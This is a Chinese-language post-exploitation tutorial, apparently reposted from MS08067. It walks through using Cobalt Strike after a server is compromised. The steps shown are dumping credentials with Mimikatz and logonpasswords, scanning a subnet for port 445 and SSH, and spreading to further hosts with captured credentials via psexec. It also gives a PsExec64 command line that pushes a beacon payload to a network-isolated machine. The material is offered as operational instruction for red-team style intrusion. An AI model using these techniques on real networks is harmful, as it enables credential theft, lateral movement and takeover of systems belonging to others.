言:
当获取一台目标服务器权限时,更多是想办法扩大战果,获取目标凭据并横向进行登陆是最快速的拿权方式。但目标所处环境是否可出网,如何利用CobalStrike进行批量上线?
一、获取凭证:
目标机器CobalSt rike上线后,通常先抓取该主机凭据,选择执行Access->Run Mimikatz,或在 Beacon中执行logonpasswords命令。需要当前会话为管理员权限,才能成功,如果权限低,先提权~
下面的是执行logonpasswords
图形中是这个。
然后查看凭证,Gredentials
但是不是每次都能抓取到明文
二、目标机出网:
获取凭据后,需要对目标网段进行端口存活探测,缩小范围。探测方式比较多,本文仅依托CobalSt rike 本身完成,不借助其他工具。因为是psexec传递登录,这里仅需探测445端口。( psexec :在主机上使 用服务派生会话)
使用portscan命令:ip网段—ports端口 一扫描协议(arp、icmp、none) 一线程(实战不要过高)。
这里我环境开了一台03的虚拟机,地址是192.168.19.134看能搜集到探测她的445端口
beacon> portscan 192.168.19.0/24 445 arp 200
点击工具栏的V iew->Ta rgets,查看端口探测后的存活主机。
然后右键,用之前收集到的凭证去试其他存活主机。如果在一个域中,所有主机的用户名和密码应该都 是一致的。
右键机器:
然后选择之前的获取的账号和密码,明文密文都可以,session选择之前的控机。
然后在beacon中就可以看到执行的命令。并且这台03的机器就会成功的上线
三、目标机不出网
实战中经常会遇到这种情况,获取到目标内网中某台主机的系统权限,但是该主机处在隔离网络中,不能出网。又因为CobalStrike服务端是搭建在互联网中的,通过常规方式是无法上线的,这里就需要利用已上线的主机,将它做一个Listener,实现链路上线CobalStrike。
注:此实验只能在4.0版本以下进行
环境模拟:
主机08服务器:192.168.203.128/24 #不出网
边界服务器:win7双网卡:192.168.19.132、192.168.203.129
vps:X.X.X.X
win7和08服务器能互相访问,但是vps访问不了08已有权限win7,试验目的,想要08系统在CS端上线,这里借鉴一下网上的方法,利用PxExec来把生成的后门传到不出网机器上,
首先把他们两个放到一个目录下
那么如何放进去呢?CS自带一个文件浏览器,只不过速度有些慢,可以的话尽量用webshell工具,直接上刀上剑放蝎子。。
这里是放到已控机器的同一目录。
然后执行命令:
beacon> shellC:\Windows\Temp\PsExec64.exe-accepteula \\192.168.203.129,192.168.203.128 -uadministrator-pasdqwe123. -d-cC:\Windows\Temp\beacon65.exe
等待上线即可、、
个人觉得这个方法太过麻烦,如果这里用l cx,ew等代理攻击进行的话,会更加的省时省力~
四、Linux主机-SSH批量上线
第一步还是探测存活主机,然后利用已控的机器进行操作上线。
环境:
CentOS: 192.168.19.139
win7:192.168.19.132
vps :x.x.x.x
通过扫描发现机器:
beacon> portscan 192.168.19.100-150 22 arp 200
然后观看存活主机
然后
建议用ssh-key
密码建议用其他方式去获取,这里爆破的话效率不高输入对的账号密码后
然后正常等待上线即可
成功上线
转自:MS08067